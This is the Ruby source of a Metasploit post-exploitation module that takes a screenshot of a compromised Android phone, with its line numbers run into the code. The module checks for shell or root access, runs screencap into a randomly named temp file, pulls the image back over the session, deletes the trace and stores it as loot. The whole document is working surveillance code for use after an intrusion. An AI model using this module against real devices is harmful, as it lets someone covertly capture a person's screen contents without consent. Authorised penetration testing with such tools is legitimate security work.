Path: blob/master/modules/post/android/capture/screen.rb
19850 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Common7include Msf::Post::File89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Android Screen Capture',14'Description' => %q{15This module takes a screenshot of the target phone.16},17'License' => MSF_LICENSE,18'Author' => [ 'timwr' ],19'Platform' => [ 'android' ],20'SessionTypes' => [ 'shell', 'meterpreter' ],21'Notes' => {22'Stability' => [CRASH_SAFE],23'SideEffects' => [],24'Reliability' => []25}26)27)2829register_options(30[31OptString.new('TMP_PATH', [true, 'Path to remote temp directory', '/data/local/tmp/']),32OptString.new('EXE_PATH', [true, 'Path to remote screencap executable', '/system/bin/screencap'])33]34)35end3637def run38id = cmd_exec('id')39unless id =~ (/root/) || id =~ (/shell/)40print_error('This module requires shell or root permissions')41return42end4344exe_path = datastore['EXE_PATH']45tmp_path = datastore['TMP_PATH']46if !file?(exe_path)47print_error('Aborting, screencap binary not found.')48return49end5051begin52file = "#{tmp_path}/#{Rex::Text.rand_text_alpha(7)}.png"53cmd_exec("#{exe_path} -p #{file}")54print_good('Downloading screenshot...')55data = read_file(file)56file_rm(file)57rescue ::Rex::Post::Meterpreter::RequestError => e58print_error('Error taking the screenshot')59vprint_error("#{e.class} #{e} #{e.backtrace}")60return61end6263unless data64print_error('No data for screenshot')65return66end6768begin69fn = 'screenshot.png'70location = store_loot('screen_capture.screenshot', 'image/png', session, data, fn, 'Screenshot')71print_good("Screenshot saved at #{location}")72rescue ::IOError, ::Errno::ENOENT => e73print_error('Error storing screenshot')74vprint_error("#{e.class} #{e} #{e.backtrace}")75return76end77end78end798081